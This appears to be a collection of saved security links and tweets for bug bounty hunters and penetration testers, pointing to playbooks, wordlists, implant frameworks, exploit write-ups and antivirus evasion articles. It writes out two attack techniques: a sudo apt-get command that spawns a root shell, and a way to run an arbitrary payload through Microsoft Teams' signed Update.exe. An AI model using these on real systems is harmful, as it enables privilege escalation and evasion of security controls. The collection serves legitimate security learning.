Guide 001 | Getting Started in Bug Bounty Hunting..

1.Basics of Networks, Programming & Automation
2.Learning about Vulnerabilities, Resource for practicing, Tools…
3.Selecting a target, starting tests & writing reports

https://t.co/XK5eR2zm8h

Linux for Pentester: APT Privilege Escalation

Exploiting Sudo rights: Method -I

sudo apt-get update -o APT::Update::Pre-Invoke::= /bin/bash https://t.co/iv7saeYsr6

GitHub - sdcampbell/Internal-Pentest-Playbook: Internal Network Penetration Test Playbook
https://github.com/sdcampbell/Internal-Pentest-Playbook

GitHub - emadshanab/WordLists-20111129: A lists of words based on common web directory and file names lists of words based on common web directory and file names. These wordlists are for Web security testing purpose.
https://github.com/emadshanab/WordLists-20111129

GitHub - dukebarman/ghidra-builder: Docker image for building ghidra RE framework from source
https://github.com/dukebarman/ghidra-builder

The Return of the WIZard: RCE in Exim - GlitchWitch.IO
https://glitchwitch.io/blog/2019-06/exploiting-cve-2019-10149/

How to Upgrade Your XSS Bug from Medium to Critical
https://medium.com/@hakluke/upgrade-xss-from-medium-to-critical-cb96597b6cc4

GitHub - BishopFox/sliver: Implant framework
https://github.com/BishopFox/sliver

DHCP Penetration Testing
https://www.hackingarticles.in/dhcp-penetration-testing/

Magic Unicorn 3.8.1 released.

Adds new method for platform detection, obfuscation, and a fix for python2 raw_input when using AMSI bypass.

https://t.co/YeXwYojd5l

Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\

Then

%userprofile%\AppData\Local\Microsoft\Teams\Update.exe --processStart payload.exe --process-start-args "whatever args"

Trusted signed binary will run the payload for you 😊

Android-Reports-and-Resources/README.md at master · B3nac/Android-Reports-and-Resources · GitHub
https://github.com/B3nac/Android-Reports-and-Resources/blob/master/README.md

Finding and Testing MisConfigured S3 Buckets ! - Rohan Chavan - Medium
https://medium.com/@rohanchavan/finding-and-testing-misconfigured-s3-buckets-d77992c4b5cd

GitHub - securityidiots/CollabOzark: CollabOzark is a simple tool which helps the researchers track SSRF, RCE, Blind XSS, XXE, External Resource Access payloads triggers.
https://github.com/securityidiots/CollabOzark

GitHub - RedTeamOperations/PivotSuite: Network Pivoting Toolkit
https://github.com/RedTeamOperations/PivotSuite

amass — Automated Attack Surface Mapping | Daniel Miessler
https://danielmiessler.com/study/amass/

GitHub - TheresAFewConors/Sooty: The SOC Analysts all-in-one CLI tool to automate and speed up workflow.
https://github.com/TheresAFewConors/Sooty

Antivirus Evasion with Python - InfoSec Write-ups - Medium
https://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1